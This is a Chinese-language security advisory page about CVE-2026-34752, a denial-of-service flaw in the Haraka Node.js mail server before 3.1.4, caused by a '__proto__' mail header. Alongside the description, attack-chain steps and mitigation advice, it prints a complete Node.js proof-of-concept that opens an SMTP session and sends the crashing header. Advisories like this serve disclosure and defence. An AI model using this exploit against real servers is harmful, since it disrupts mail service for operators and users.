IPBUF安全漏洞报告
English
CVE-2026-34752 CVSS 7.5 高危

CVE-2026-34752 Haraka邮件服务器拒绝服务漏洞

披露日期: 2026-04-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34752
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Haraka

相关标签

拒绝服务HarakaNode.js邮件服务器原型污染

漏洞概述

Haraka是一款Node.js邮件服务器。在3.1.4版本之前,攻击者可以发送包含特定邮件头名称'__proto__:'的恶意邮件,导致Haraka工作进程崩溃。该漏洞由于未能正确处理邮件头属性引发,无需认证即可利用,导致服务不可用。建议用户尽快升级至修复版本。

技术细节

该漏洞源于Haraka在解析邮件头时,缺乏对特殊JavaScript属性名称的过滤。攻击者无需用户交互,通过网络向服务器发送构造的SMTP数据包,其中包含名为'__proto__'的邮件头。在Node.js环境中,`__proto__`属性具有特殊含义,指向对象的原型。当Haraka尝试解析并处理该邮件头时,可能会触发原型污染或意外的属性设置,导致工作进程抛出未捕获的异常并崩溃。由于CVSS评分为7.5且影响可用性,远程攻击者可利用此漏洞轻松造成邮件服务中断。

攻击链分析

STEP 1
侦察
攻击者识别目标网络上运行的Haraka邮件服务器。
STEP 2
建立连接
攻击者通过TCP端口25与目标服务器建立SMTP连接。
STEP 3
发送恶意载荷
攻击者发送SMTP指令,并在DATA阶段插入包含'__proto__'作为邮件头名称的恶意邮件数据。
STEP 4
触发漏洞
Haraka进程解析邮件头时,由于未正确处理'__proto__'属性,触发异常导致工作进程崩溃,服务中断。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC for CVE-2026-34752 // This script sends an email with a '__proto__' header to crash the Haraka worker process. const net = require('net'); const targetHost = '127.0.0.1'; // Replace with target IP const targetPort = 25; const socket = net.connect(targetPort, targetHost, () => { console.log('[+] Connected to target'); // SMTP Handshake socket.write('EHLO poc.example.com\r\n'); setTimeout(() => { // MAIL FROM socket.write('MAIL FROM: <[email protected]>\r\n'); }, 500); setTimeout(() => { // RCPT TO socket.write('RCPT TO: <[email protected]>\r\n'); }, 1000); setTimeout(() => { // DATA command socket.write('DATA\r\n'); }, 1500); setTimeout(() => { // Malicious payload: Sending '__proto__' header // This triggers the vulnerability in Haraka < 3.1.4 let payload = 'Subject: Crash Test\r\n'; payload += '__proto__: crash\r\n'; // The vulnerable header payload += '\r\n'; payload += 'This email will crash the server.\r\n'; payload += '.\r\n'; // End of data marker socket.write(payload); console.log('[+] Payload sent'); }, 2000); setTimeout(() => { socket.end(); }, 3000); }); socket.on('error', (err) => { console.error('[-] Connection error:', err.message); });

影响范围

Haraka < 3.1.4

防御指南

临时缓解措施
如果不能立即升级,建议部署输入过滤中间件,拦截包含'__proto__'、'constructor'等JavaScript原型链关键字的SMTP流量,以防止攻击者利用该特性导致服务崩溃。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表